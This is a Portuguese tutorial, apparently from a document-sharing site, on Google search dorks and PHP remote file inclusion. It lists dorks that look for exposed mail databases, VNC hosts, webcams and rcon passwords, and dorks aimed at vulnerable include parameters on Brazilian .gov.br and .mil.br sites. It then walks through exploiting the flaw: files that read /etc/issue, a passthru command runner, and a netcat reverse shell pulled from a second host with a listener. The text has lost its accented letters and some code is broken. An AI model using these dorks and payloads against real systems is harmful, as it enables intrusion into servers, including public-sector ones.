Vous êtes sur la page 1sur 5

Google Hacking O que ?

Essa tcnica a atividade de usar os recursos de busca do site, visando atacar ou melhor proteger as informaes de uma empresa. Podemos fazer uma busca, da seguinte maneira: intitle:patenha Ao fazermos essa busca, encontramos referncias aos sites que tem em seu ttulo a palavra hakcerteen. Outro exemplo: inurl: gov.br J nesse exemplo, fazemos buscas a sites que pertenam ao governo brasileiro, ou seja, que tenham a extenso gov.br allinurl: cartilha.php Com essa opo, estamos buscando no endereo todos os sites que tem disponveis para pesquisa ou que esto linkados com o arquivo chamado cartinha.php site: www.patenha.com.br Nessa opo, estamos restringindo a busca a apenas esse endereo de site. Ento nesse caso, ele procura referncias ao link ou a informaes somente do site mesmo. filetype: .php Quando realizarmos essa pesquisa, ele mostrar todos os sites que contm arquivos com a extenso .php em seus endereos. Para saber mais informaes sobre tcnicas que podemos usar para pesquisar, acesse o link: http://www.google.com.br/help/operators.html inurl:e-mail filetype:mdb inurl:@hotmail.com filetype:mdb Com essa busca, conseguimos arquivos de e-mail em formato mdb (mail database) inurl: intranet + intext:"telefone" Essa pesquisa busca telefones que esto disponveis em intranets diversas que o google consegue localizar. site:oracle.com -site:www.oracle.com Com essa pesquisa, conseguimos identificar diversos domnios (conhecidos tambm como subdomnios) que esto relacionados aos domnios da Oracle. Outro exemplo: site:microsoft.com -site:www.microsoft.com Com essa pesquisa, conseguimos localizar diversos subdomnios relacionados ao site da Microsoft. Para detectar portas abertas, como por exemplo buscar por uma porta 8080 que est aberta, pode fazer pesquisas da seguinte maneira: inurl:8080 -intext:8080 Analise o comando abaixo: intitle:VNC inurl:5800 intitle:VNC Com esse comando, conseguimos saber hosts que esto com o VNC disponveis. Isso no quer dizer que o VNC no est seguro. Isso apenas uma busca que

ajuda a saber hosts com VNC. Outra maneira que temos de buscar hosts com VNC com a pesquisa: intitle:"VNC Viewer for Java" Encontrando sites que realizam portscan no Google filetype:php inurl:nqt intext:"Network Query Tool" Portscan um software utilizado para verificar as portas abertas em um host remoto. Podemos at mesmo tentar descobrir uma webcam no google. Para isso, a pesquisa seria assim: "Active Webcam Page" inurl:8080 Encontrando uma webcam da toshiba: intitle:"toshiba network camera - User Login" Podemos tambm encontrar banners de alguns servidores web. Por exemplo: "Apache/1.3.20 server at" intitle:index.of Procurando pelo painel de controle do asterisk, atravs de uma interface flash. A pesquisa ficaria assim: intitle:"Flash Operator Panel" -ext:php -wiki -cms -inurl:as Podemos tentar fazer pesquisas para buscar senhas de servidor de Counter Strike: inurl:server.cfg rcon password PHP Inject Aprendemos todas essas maneiras de pesquisar na web, porque vamos ver um assunto muito interessante e muito aplicado no mundo underground. O PHP Injection. Essa uma falha que muitos ADMs cometem. Porque quando eles instalam servidores de e-mail padres, com suporte a PHP e no verificam as vulnerabilidades, podem ter problemas. Ento, podemos usar as pesquisas no google para analisar sites em PHP, que atravs de palavras padres que so usadas na configurao, possvel verificar se tem um falha que permita o uso do PHPInject. Para isso, vamos fazer pesquisas por palavras comuns e importantes, como adm, inc e body em sites brasileiros. Por exemplo: allinurl:".php?adm=" site:.gov.br allinurl:".php?inc=" site:.gov.br allinurl:".php?body=" site:.gov.br (talvez no encontre nenhum resultado) Podemos fazer pesquisas poe palavras como main, pag, page e pagina, em sites militares, por exemplo: allinurl:".php?main=" site:.mil.br (talvez no encontre nenhum resultado) allinurl:".php?pag=" site:.mil.br allinurl:".php?page=" site:.mil.br allinurl:".php?pagina=" site:.mil.br (talvez no encontre nenhum resultado) ***** Mais uma maneira de pesquisar por palavras chaves em sites militares brasileiros: allinurl:".php?content=" site:.mil inurl:br (talvez no encontre nenhum resultado) allinurl:".php?cont=" site:.mil inurl:br (talvez no encontre nenhum resultado) allinurl:".php?var=" site:.mil inurl:br (talvez no encontre nenhum resultado) *****

Podemos fazer uma pesquisa por palavras simples tambm: allinurl:".php?meio=" allinurl:".php?produto=" allinurl:".php?cat=" Pesquisas por palavras chaves: allinurl:".php?site=" allinurl:".php?do=" allinurl:".php?content=" Mais palavras chaves: allinurl:".php?admin=" allinurl:".php?adm=" allinurl:".php?root=" Buscando scripts em perl em um site: filetype:pl site:dominio.com.br filetype:pl site:uol.com.br filetype:pl site:terra.com.br Explorando a Falha PHP Injection Os testes foram feitos em uma mquina RedHat 7.3 com servidor web Apache verso 1.3.23-11 e PHP verso 4.1.2-7 No diretrio /var/www/html do servidor Apache, onde ficam os documentos que vo ser publicados. E dentro desse arquivo, estavam criados os arquivos index.php teste.php e teste1.php O arquivo index.php tinha o seguinte contedo: phpinfo (); ?> O arquivo teste.php tinha o seguinte contedo: include (\teste1.php"); ?> Contedo do arquivo teste1.php: echo \ Conteudo.INC "; ?> No arquivo teste1.php estamos usando a funo include. Essa funo permite incluir o arquivo inteiro dentro de uma pgina j pronta e tambm permite fazer incluses remotas. O meu servidor web est no IP 192.168.0.160 ento no navegador coloquei a linha: http://192.168.0.160/teste.php E quando digitei isso, apareceu: Conteudo.INC Depois, criei em /var/www/html um arquivo chamado teste2.php que continha o seguinte contedo: include ($base);

?> Depois, novamente no navegador, coloquei o seguinte endereo: http://192.168.0.160/teste2.php?base=/etc/issue Com essas informaes, obtive a seguinte linha: Red Hat Linux release 7.3 Evaluation (Valhalla) Kernel \r on an \m Outro objetivo agora obter o shell na mquina da vtima. O passo mais comum obt-la usando o auxlio do netcat, ou o nc. Primeiramente, vamos no diretrio /var/www/html e criar o arquivo comando2.php. O contedo dele : passthru (\$cod"); ?> A funo do passthru executar comando. Ento agora poder ser passado para a varivel cod qualquer comando que o usurio apache (usurio comum) tenha permisso de executar. Ento, vamos testar se existe o comando no servidor alvo: http://192.168.0.160/teste2.php?base=http://192.168.0.161/comando2.php&cod= which%20nc Se existir, a seguinte sada ir aparecer: /usr/bin/nc Novamente, criamos um arquivo comando3.php com o seguinte contedo: passthru (\nc -e /bin/bash 192.168.0.x 666"); ?> E por fim, validamos o contedo do comando3.php no navegador: http://192.168.0.160/teste2.php?base=http://192.168.0.161/comando3.php Depois disso, o sistema j est comprometido. Basta apenas tentar obter os privilgios de root. E depois que o comando nc j est no diretrio /tmp do servidor da vtima, ento j temos permisso de execuo. Sendo assim, podemos usar o comando para enviar um shell do servidor para sua mquina, como se fosse um acesso remoto mesmo. E ento podemos abrir a porta 666 na mquina e aguardar o envio de shell: nc -l -vv -p 666 Aps isso, conseguimos executar comandos via browser, como por exemplo: http://192.168.0.160/teste2.php?base=http://192.168.0.161/comando2.php&cod= ls%20-la Com esse comando, conseguimos listar os arquivos do servidor.

E pronto, agora basta executarmos os comandos que forem necessrios!

Vous aimerez peut-être aussi